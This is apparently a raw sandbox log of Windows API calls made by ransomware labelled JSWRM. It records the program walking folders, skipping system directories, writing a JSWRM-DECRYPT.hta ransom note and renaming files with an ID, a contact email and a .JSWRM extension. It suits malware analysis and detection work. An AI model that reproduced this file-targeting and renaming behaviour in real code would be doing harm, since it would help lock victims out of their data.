[0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.608] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.608] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.609] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.610] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10081696995331408) returned 0 [0068.610] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.610] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.610] CloseHandle (hObject=0xffffffff) returned 1 [0068.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0068.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.610] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.611] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.611] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.611] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2=".") returned 1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="..") returned 1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="...") returned 1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="windows") returned -1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="recovery") returned -1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="perflogs") returned 1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="documents and settings") returned 1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="$RECYCLE.BIN") returned 1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="system volume information") returned -1 [0068.611] lstrcmpiW (lpString1="pl-PL", lpString2="msocache") returned 1 [0068.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.611] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\jswrm-decrypt.hta")) returned 0xffffffff [0068.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.624] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.624] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.624] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.625] CloseHandle (hObject=0x454) returned 1 [0068.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\jswrm-decrypt.hta")) returned 0x20 [0068.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.626] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8fc12f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232000 [0068.626] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.626] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8fc12f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.626] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.626] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.626] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8fc12f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8fc12f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8fc12f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.626] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.627] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.627] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 